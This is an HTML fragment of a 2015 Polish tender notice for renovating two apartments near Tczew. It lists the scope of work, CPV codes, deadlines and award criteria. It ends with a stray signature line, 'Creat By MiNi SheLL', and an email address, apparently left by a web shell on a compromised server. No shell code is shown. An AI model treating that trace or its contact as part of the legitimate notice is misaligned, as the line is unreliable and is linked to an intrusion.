<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 11:00, miejsce: Sekretariat Agencji Nieruchomości Rolnych Oddziału Terenowego w Gdańsku z siedzibą w Pruszczu Gdańskim, ul. Powstańców Warszawy 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1: Wykonanie remontu mieszkania w miejscowości Mieścin 6A/3 gm. Tczew, działka nr 136 zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, 
Zakres robót: 
1)	wymiana okien drewnianych na nowe z PCV,
2)	wymiana na nowe drzwi wewnętrzne i zewnętrzne,
3)	naprawa podłóg - posadzki betonowe pokryte wykładziną PCV,
4)	wymiana instalacji elektrycznej na nową miedzianą,
5)	remont instalacji c.o., wod-kan,
6)	naprawa uszkodzonego obicia ścian w tym wymiana na płyty GK,
7)	naprawa pokrycia dachowego, 
8)	adaptacja pomieszczenia na łazienkę z WC.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.21.00.00-2, 45.21.13.10-5, 45.33.20.00-3, 45.41.00.00-4, 45.42.00.00-7, 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. Gwarancja na roboty budowlane - 6</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2: Wykonanie robót budowlanych remontowych polegających na remoncie mieszkania w budynku mieszkalnym wielorodzinnym w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew działka nr 156 wraz z montażem 3 wkładów kominowych o długości 2 kondygnacji i poddasza oraz wykonaniem odwiertów w celu wentylacji pustki powietrznej zgodnie z projektem budowlanym ze specyfikacją techniczną wykonania i odbioru robót budowlanych. 

Zakres robót: 
1)	remont pomieszczeń poprzez odgrzybienie ścian, odnowa powłok malarskich,
2)	przestawienie pieca,
3)	wykonanie drabiny na dach,
4)	wykonanie dojścia do komina,
5)	wyprowadzenie istniejącej wentylacji nad dach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.26.00.00-7, 45.21.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. Gwarancja na roboty budowlane - 6</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com